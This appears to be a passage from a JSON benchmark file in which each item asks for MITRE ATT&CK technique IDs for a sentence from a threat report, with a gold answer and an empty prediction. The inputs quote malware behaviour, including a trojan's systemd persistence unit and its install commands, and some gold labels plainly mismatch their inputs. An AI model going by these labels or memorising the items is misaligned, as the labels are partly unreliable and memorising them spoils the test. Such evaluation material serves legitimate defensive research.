observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Another difference in the network traffic generated from the malware is that the encoded proxy information has been added in the URL query values during the C2 communication. Table 4 shows the parameters sent to C2 server from the backdoor in the newer versions\n\t - T1090.002: Proxy - External Proxy\n- Text: QuasarRAT can communicate over a reverse proxy using SOCKS5.\n\t - T1090: Proxy\n- Text: Operation Wocao has executed commands through the installed web shell via Tor exit nodes.\n\t - T1090.003: Proxy - Multi-hop Proxy\n", "input": "\n[9] \u201cHKU concern group raises proxy fears in key vote.\u201d EIJ Insight", "gold": "- T1090: Proxy", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Bazar can gain execution after a user clicks on a malicious link to decoy landing pages hosted on Google Docs.\n\t - T1204.001: User Execution - Malicious Link\n- Text: On February 12, 2018 at 16:45 (all times are in the\u00a0organization\u2019s local time), an email was sent to the organization advertising a job vacancy at an American global service provider. The email contained a malicious link to hxxp://mynetwork.ddns[DOT].net:880\n\t - T1566.002: Phishing - Spearphishing Link\n- Text: has delivered zero-day exploits and malware to victims via targeted emails containing a link to malicious content hosted on an uncommon Web server.\n\t - T1598.003: Phishing for Information - Spearphishing Link\n", "input": "\nIt\u2019s important to remember, that while we were using Bitly links to help gauge click location, anyone who clicks these links (including researchers) are also counted", "gold": "- T1598.003: Phishing for Information - Spearphishing Link", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Proxysvc performs data exfiltration over the control server channel using a custom protocol.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: Kessel can exfiltrate credentials and other information via HTTP POST request, TCP, and DNS.\n\t - T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol\n- Text: ADVSTORESHELL connects to port 80 of a C2 server using Wininet API. Data is exchanged via HTTP POSTs.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n", "input": "\nLater variants upload the file to a web server via an HTTP post command", "gold": "- T1071: Application Layer Protocol", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: an \u201cobject_id\u201d that is a unique uuid used to identify the victim, when the value is not set in the file, it is generated randomly by the malware - a list of processes into which code is injected (iproc) - the frequency and time for task execution / backup logs / connection to the C&C ([TIME]) - the IP addresses of other computers on the network ([CW_LOCAL]) - the C&C server addresses ([CW_INET]) - the named pipes used to communicate with the injected library and with the other computers ([TRANSPORT\n\t - T1016: System Network Configuration Discovery\n- Text: Zebrocy uses \"netstat -aon\" to gather network connection information.\n\t - T1049: System Network Connections Discovery\n", "input": "\nhas gathered information about network IP configurations using .exe and about routing tables using .exe.", "gold": "- T1016: System Network Configuration Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The attackers also ran the nmap utility on the router VM and scanned ports on systems within the restricted segment of the enterprise network. On September 27, the attackers started removing all traces of their activity from the router, using the logrotate utility to set up automatic deletion of log files\n\t - T1070.003: Indicator Removal - Clear Command History\n\t - T1046: Network Service Discovery\n- Text: Chinese state-sponsored cyber actors have been assessed to perform reconnaissance on Microsoft\u00ae 365 (M365), formerly Office\u00ae 365, resources with the intent of further gaining information about the networks. These scans can be automated, through Python\u00ae scripts, to locate certain files, paths, or vulnerabilities. The cyber actors can gain valuable information on the victim network, such as the allocated resources, an organization\u2019s fully qualified domain name, IP address space, and open ports to target or exploit.\n\t - T1595: Active Scanning\n\t - T1590: Gather Victim Network Information\n- Text: TeamTNT has scanned specific lists of target IP addresses.\n\t - T1595.001: Active Scanning - Scanning IP Blocks\n", "input": "\nhas used the publicly available tool SoftPerfect Network Scanner as well as a custom tool called GOLDIRONY to conduct network scanning.", "gold": "- T1046: Network Service Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: used regsvr32.exe to execute scripts.\n\t - T1218.010: System Binary Proxy Execution - Regsvr32\n- Text: MuddyWater has used CMSTP.exe and a malicious INF to execute its POWERSTATS payload.\n\t - T1218.003: System Binary Proxy Execution - CMSTP\n- Text: can use Rundll32 to execute additional payloads.\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n", "input": "\ncan use Regsvr32 to execute additional payloads.", "gold": "- T1218.010: System Binary Proxy Execution - Regsvr32", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Pupy can be used to establish persistence using a systemd service.\n\t - T1543.002: Create or Modify System Process - Systemd Service\n- Text: uses to execute a payload or commands on a remote host.\n\t - T1569.002: System Services - Service Execution\n", "input": "\nCreates the service file /usr/lib/systemd/system/rsyncd.service [Unit]Description= synchronize and backup service.After=syslog.target [Service].ExecStart=/bin/rsyncd.OOMScoreAdjust=-500 [Install].WantedBy=multi-user.target Then it installs the service by executing the following commands: ln -s '/lib/systemd/system/rsyncd.service' '/etc/systemd/system/multi-user.target.wants /rsyncd.service' systemctl daemon-reload The running systemd process determines, which option will be used to register the Trojan in autorun", "gold": "- T1007: System Service Discovery\n- T1543.003: Create or Modify System Process - Windows Service\n- T1021: Remote Services\n- T1102: Web Service\n- T1569.002: System Services - Service Execution", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Besides the stolen data, it sends the Windows product name and version, username, computer name, and domain name to the C&C server\n\t - T1082: System Information Discovery\n- Text: PcShare can search the registry files of a compromised host.\n\t - T1012: Query Registry\n- Text: Gather domain and account names based on all running processes Gathering account information from running processes\n\t - T1057: Process Discovery\n", "input": "\nis capable of gathering system information.", "gold": "- T1082: System Information Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: TajMahal has the ability to capture VoiceIP application audio on an infected host.\n\t - T1123: Audio Capture\n- Text: TajMahal has the ability to capture webcam video.\n\t - T1125: Video Capture\n- Text: Specifies the screen coordinates to take -zip Name of password (from configuration data) protected zip archive -clipboard Screenshot file name where a bitmap from the clipboard is saved in Cache005 subdirectory, zipped with password from configuration Data exfiltration Exfiltration is done through the bitsadmin.exe utility\n\t - T1113: Screen Capture\n\t - T1115: Clipboard Data\n\t - T1560: Archive Collected Data\n\t - T1132: Data Encoding\n\t - T1486: Data Encrypted for Impact\n", "input": "\ncan perform audio capture.", "gold": "- T1123: Audio Capture", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Tracing the origin of the hidden .mina file showed that it is a copy of an included resource, renamed SubMenu.nib, from the application bundle and where the main backdoor functions were contained. It also has the same links to Lazarus\u2019 Windows and Linux predecessors: the presence of the hardcoded strings c_2910.cls and k_3872.cls. Both strings were previously used during C&C communication to the domain thevagabondsatchel[.]com as the sample storage of the cybercriminal group, as reported by 360 Netlab researchers\n\t - T1027: Obfuscated Files or Information\n\t - T1564.001: Hide Artifacts - Hidden Files and Directories\n- Text: Execute Pluginhost.exe, the plugin management component. Save the payloads as Alternate Data Streams and set scheduled tasks to run them\n\t - T1564.004: Hide Artifacts - NTFS File Attributes\n- Text: ComRAT has used a portable FAT16 partition image placed in %TEMP% as a hidden file system.\n\t - T1564.005: Hide Artifacts - Hidden File System\n", "input": "\nAn loader Trojan saves its payload with hidden file attributes.", "gold": "- T1564.001: Hide Artifacts - Hidden Files and Directories", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: is capable of enumerating and making modifications to an infected system's Registry.\n\t - T1012: Query Registry\n- Text: Monday, February 12, 2018 . Olympic Destroyer Takes Aim At Winter Olympics . This blog post is authored by Warren Mercer and Paul Rascagneres. The Guardian, a UK Newspaper reported an article that suggested the Olympic computer systems suffered technical issues during the opening ceremony. The destructive nature of this malware aims to render the machine unusable by deleting shadow copies, event logs and trying to use PsExec & WMI to further move through the environment. Olympic Destroyer Workflow . Initial stage . The initial edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9 sample is a binary that, when executed, drops multiple files on to the victim host. Dropped Files . Browser Credential Stealer . Olympic Destroyer drops a browser credential stealer. SQLite is embedded in the sample: . System Credential Stealer . In additional to the browsers credential stealer, Olympic Destroyer drops and executes a system stealer. The stealer attempts to obtain credentials from LSASS with a technique similar to that used by Mimikatz. Additionally, the destroyer disables all the services on the system: The malware uses the ChangeServiceConfigW API to change the start type to 4 which means: \"Disabled: Specifies that the service should not be started. Legitimate File . Additionally, the Olympic Destroyer drops the legitimate, digitally signed, PsExec file in order to perform lateral movement by using this legitimate tool from Microsoft. Disruption is the clear objective in this type of attack and it leaves us confident in thinking that the actors behind this were after embarrassment of the Olympic committee during the opening ceremony\n\t - T1070.001: Indicator Removal - Clear Windows Event Logs\n- Text: UNC2452 used \"AUDITPOL\" to prevent the collection of audit logs.\n\t - T1562.002: Impair Defenses - Disable Windows Event Logging\n", "input": "\nenumerates Registry keys associated with event logs.", "gold": "- T1012: Query Registry", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: One of the access vectors most used by ACTINIUM is spear-phishing emails with malicious macro attachments that employ remote templates. Remote template injection refers to the method of causing a document to load a remote document template that contains the malicious code, in this case, macros\n\t - T1566.001: Phishing - Spearphishing Attachment\n\t - T1027: Obfuscated Files or Information\n\t - T1204.002: User Execution - Malicious File\n\t - T1221: Template Injection\n- Text: A macro in the Microsoft Word document contained the malicious code designed to download and execute additional malicious software on the infected system\n\t - T1566.001: Phishing - Spearphishing Attachment\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: Gamaredon is an advanced persistent threat (APT) group that has been active since 2013. From late 2019 to February of this year, researchers published several reports on Gamaredon, tracking the group\u2019s activities\n\t - T1140: Deobfuscate/Decode Files or Information\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n", "input": "\nThe majority of delivery documents contain a generic lure image requesting the victim enable macros with no additional content, the adversaries seemingly relying solely on lure filenames to entice victims to launch the malicious document", "gold": "- T1204: User Execution", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: performs data exfiltration over the control server channel using a custom protocol.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: During Frankenstein, the threat actors collected information via Empire, which was automatically sent back to the adversary's C2.\n\t - T1020: Automated Exfiltration\n- Text: LightNeuron can be configured to exfiltrate data during nighttime or working hours.\n\t - T1029: Scheduled Transfer\n", "input": "\nexfiltrates data to its C2 server over the same protocol as C2 communications.", "gold": "- T1041: Exfiltration Over C2 Channel", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Leviathan has used publicly available tools to dump password hashes, including HOMEFRY.\n\t - T1003: OS Credential Dumping\n- Text: Koadic can gather hashed passwords by gathering domain controller hashes from NTDS.\n\t - T1003.003: OS Credential Dumping - NTDS\n- Text: UNC2452 leveraged privileged accounts to replicate directory service data with domain controllers.\n\t - T1003.006: OS Credential Dumping - DCSync\n", "input": "\nBecause of Poseidon\u2019s longevity, there are samples targeting Windows systems as early as Windows NT 4.0 Server and Windows 95 Workstation up to current versions like Windows 8.1, as well as server variants (very important to them, given the emphasis on reaching Domain Controllers in corporate environments.) How is this different from any other targeted attack? The extortion elements of this campaign are what set it apart from others", "gold": "- T1010: Application Window Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The code will gather some information about the system, specifically the local IP address, MAC address, and the external IP address of the system\n\t - T1016: System Network Configuration Discovery\n- Text: This blog details the markers of this campaign, including macro content, campaign flow and phishing themes of our identified variants and older variants that have been attributed to Lazarus by other vendors. The Qualys Research Team recently identified a new Lazarus campaign using employment phishing lures targeting the defence sector. This is thematically similar to other observed variants where Lazarus has posed as defence companies like Northrop Grumman and BAE Systems with job openings. LockHeed Recruitment Lure . The macro uses aliases to rename the APIs that it uses (fig. 5). Other variants have used the UuidFromStringA function to decode the embedded payload and write it to an executable Heap. Lazarus has also used other novel methods to execute shellcode such as by using the function EnumSystemLocalesA as a callback to shellcode written to executable heap. 8). shellObj is the Wscript.Shell object that the vbs file uses to execute the beacon command. Additional vendors have also identified a variant that uses pcalua.exe. Additional vendors have reported on the current campaign while attributing it to Lazarus. Lazarus continues to evolve its capabilities by utilizing lesser-known shellcode execution techniques and incorporating various lolbins as part of its campaign\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: The role of Torisma is to monitor for new drives added to the system as well as remote desktop connections. This appears to be a more specialized implant focused on active monitoring on a victim\u2019s system and triggering the execution of payloads based on monitored events. The end objective of Torisma is executing shellcode on the victim\u2019s system and sending the results back to the C2\n\t - T1049: System Network Connections Discovery\n", "input": "\nhas run ipconfig /all on a victim.", "gold": "- T1016: System Network Configuration Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The Netwalker DLL has been injected reflectively into the memory of a legitimate running process.\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n- Text: samples have been seen which hijack COM objects for persistence by replacing the path to shell32.dll in registry location HKCU\\Software\\Classes\\CLSID\\{42aedc87-2188-41fd-b9a3-0c966feabec1}\\InprocServer32.\n\t - T1546.015: Event Triggered Execution - Component Object Model Hijacking\n- Text: ChromeUpdate.exe starts the file with \u201crundll32 cache.dll,ADB_Setup\u201d Cache.dll analysis Cache.dll was written in C/C++ and built with a Microsoft compiler\n\t - T1055: Process Injection\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n", "input": "\n20 New processes The malicious svchost constantly queries ieframe.dll, as well as IWebBrowser2 Interface using CLSID dc30c1661-cdaf-11D0-8A3E-00c04fc9e26e, both key components to interact with Internet Explorer", "gold": "- T1055: Process Injection", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: A menuPass macro deletes files after it has decoded and decompressed them.\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: Pillowmint can uninstall the malicious service from an infected machine.\n\t - T1070: Indicator Removal\n\t - T1070.009: Indicator Removal - Clear Persistence\n- Text: At this point, the script establishes an HTTP connection to the C2 server. If the server response is comprised only of the same GUID that the malware sent, the script deletes itself. In the case of the second-stage script from Variant A, the script deletes the registry key where it is installed. In the case of Variant C, the script deletes the file from which it is running. If instead the server responds with any data other than the GUID, the second-stage script decrypts the data and saves it as a file\n\t - T1070.004: Indicator Removal - File Deletion\n\t - T1070: Indicator Removal\n", "input": "\ncan remove itself from a system.", "gold": "- T1070.004: Indicator Removal - File Deletion", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: GrimAgent can delete old binaries on a compromised host.\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: clears the system event logs.\n\t - T1070: Indicator Removal\n- Text: It also deletes Windows Event Logs : Application, Security, Setup, System. It is less focused on deleting documents\n\t - T1070.001: Indicator Removal - Clear Windows Event Logs\n", "input": "\ndeletes its payload along with the payload's parent process after it finishes copying files.", "gold": "- T1070.004: Indicator Removal - File Deletion", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Mofang delivered spearphishing emails with malicious links included.\n\t - T1566.002: Phishing - Spearphishing Link\n- Text: Like many other phishing attacks, in this phishing campaign, Charming Kitten uses a fake SMS (Figure 1) to trick their victims. They send confirmation messages stating \u2018Google Account Recovery\u2019 to their targets; they claim these messages are sent by Google and the user must follow the link in the SMS to confirm the identity\n\t - T1598.003: Phishing for Information - Spearphishing Link\n- Text: MuddyWater has distributed URLs in phishing e-mails that link to lure documents.\n\t - T1204.001: User Execution - Malicious Link\n", "input": "\nhas used spearphishing with links to deliver files with exploits to initial victims. The group has used embedded image tags (known as web bugs) with unique, per-recipient tracking links in their emails for the purpose of identifying which recipients opened messages.", "gold": "- T1598.003: Phishing for Information - Spearphishing Link", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: downloads and installs Tor via homebrew.\n\t - T1090.003: Proxy - Multi-hop Proxy\n- Text: The actor then tested connectivity to an IP managed by the victim\u2019s service provider. Once connectivity to the service provider IP was verified, the actor established the service provider IP as a proxy for the victim\u2019s SOGU backdoor. This effectively routes SOGU malware traffic through the victim\u2019s service provider, which likely indicates a foothold on the service provider\u2019s network. The tactic also serves to mask malicious C2 and exfiltration traffic and make it appear innocuous\n\t - T1090.002: Proxy - External Proxy\n- Text: The next step after installing the malicious service would be to set up tunnels to access to the infected machine from remote hosts, for example using the following command\n\t - T1090: Proxy\n", "input": "\nuses multiple proxies to obfuscate network traffic from victims.", "gold": "- T1090: Proxy", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The group extensively uses long-running strategic web compromises[2] (SWCs), and relies on whitelists to deliver payloads to select victims. In comparison to other threat groups, TG-3390 is notable for its tendency to compromise Microsoft Exchange servers using a custom backdoor and credential logger\n\t - T1189: Drive-by Compromise\n- Text: overwrite or delete MBR in same sentence\n\t - T1561.002: Disk Wipe - Disk Structure Wipe\n- Text: Andariel has hidden malicious executables within PNG files.\n\t - T1027.003: Obfuscated Files or Information - Steganography\n", "input": "\nGroup123 Links? As we explore the Korean malware landscape, we always have burning questions relating to any possible links with Group123", "gold": "- T1598.003: Phishing for Information - Spearphishing Link", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Gelsemium can check for the presence of specific security products.\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: Chinese state-sponsored cyber actors have been observed using multiple implants with file system enumeration and traversal capabilities.\n\t - T1083: File and Directory Discovery\n- Text: NanoCore has the capability to download and activate additional modules for execution.\n\t - T1105: Ingress Tool Transfer\n", "input": "\n10 Ensuring the files have been downloaded After the malware is downloaded and files verified, the script will check in the C:\\Program Files\\ directory for the presence Avast antivirus, which happens to be the most common installed AV worldwide", "gold": "- T1083: File and Directory Discovery\n- T1105: Ingress Tool Transfer", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Assuming the lists of credentials are valid, the mass collection confirms our hypothesis that the OilRig group maintains a heavy emphasis on credential based attacks along with the other types of attacks they deploy\n\t - T1003: OS Credential Dumping\n- Text: JPIN checks for the presence of certain security-related processes and deletes its installer/uninstaller component if it identifies any of them.\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: During Night Dragon, threat actors disabled anti-virus and anti-spyware tools in some instances on the victim\u2019s machines. The actors also disabled proxy settings to allow direct communication from victims to the Internet.\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n", "input": "\nKaspersky Lab products detect the malware used by Poseidon Group with the following detection names: Backdoor.Win32.Nhopro HEUR:Backdoor.Win32.Nhopro.gen HEUR:Hacktool.Win32.Nhopro.gen How many victims have you found? At least 35 victim companies have been identified with primary targets including financial and government institutions, telecommunications, manufacturing, energy and other service utility companies, as well as media and public relations firms", "gold": "- T1070.004: Indicator Removal - File Deletion", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: HOMEFRY uses a command-line interface.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: has downloaded additional malware to execute on the victim's machine, including by using a PowerShell script to launch shellcode that retrieves an additional payload.\n\t - T1105: Ingress Tool Transfer\n- Text: is capable of providing shell functionality to the attacker to execute commands.\n\t - T1059: Command and Scripting Interpreter\n", "input": "\nmalware can use cmd.exe to download and execute payloads and to execute commands on the system.", "gold": "- T1059: Command and Scripting Interpreter", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: One variant of BlackEnergy locates existing driver services that have been disabled and drops its driver component into one of those service's paths, replacing the legitimate executable. The malware then sets the hijacked service to start automatically to establish persistence.\n\t - T1574.010: Hijack Execution Flow - Services File Permissions Weakness\n- Text: TeamTNT has searched for unsecured AWS credentials and Docker API credentials.\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n- Text: Code is included to copy the clipboard, delete files, compress files, clear event logs, shut down the machine, and much more\n\t - T1115: Clipboard Data\n\t - T1070.004: Indicator Removal - File Deletion\n\t - T1070: Indicator Removal\n", "input": "\nThis strangeness\u00a0was related to values listed in newer\u00a0BlackEnergy configuration files", "gold": "- T1027: Obfuscated Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and 